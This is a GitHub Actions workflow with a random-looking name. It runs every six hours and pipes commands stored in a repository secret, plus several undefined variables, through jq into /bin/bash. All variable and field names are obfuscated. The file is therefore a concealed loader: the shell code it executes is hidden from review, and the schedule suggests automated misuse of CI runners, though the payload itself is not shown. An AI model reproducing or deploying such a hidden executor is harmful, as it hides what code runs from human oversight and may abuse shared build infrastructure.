name: xiaoyushi7654

on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiaoyushi7654
        env:
          u433: ${{ secrets.u433 }}
        run: |
          echo $u433 | jq -r .naklx9013 | /bin/bash
          echo $wrwsq3 | jq -r .zw70 | /bin/bash
          echo $f2111 | jq -r .plu66 | /bin/bash
          echo $ex105 | jq -r .jj97484 | /bin/bash
          echo $vn869 | jq -r .z51351 | /bin/bash
          echo $jh65 | jq -r .byftw97757 | /bin/bash
          echo $ujb9457 | jq -r .nsbam6403 | /bin/bash
          echo $tj9 | jq -r .rhikx261 | /bin/bash
          echo $ycuiu1863 | jq -r .rd24166 | /bin/bash

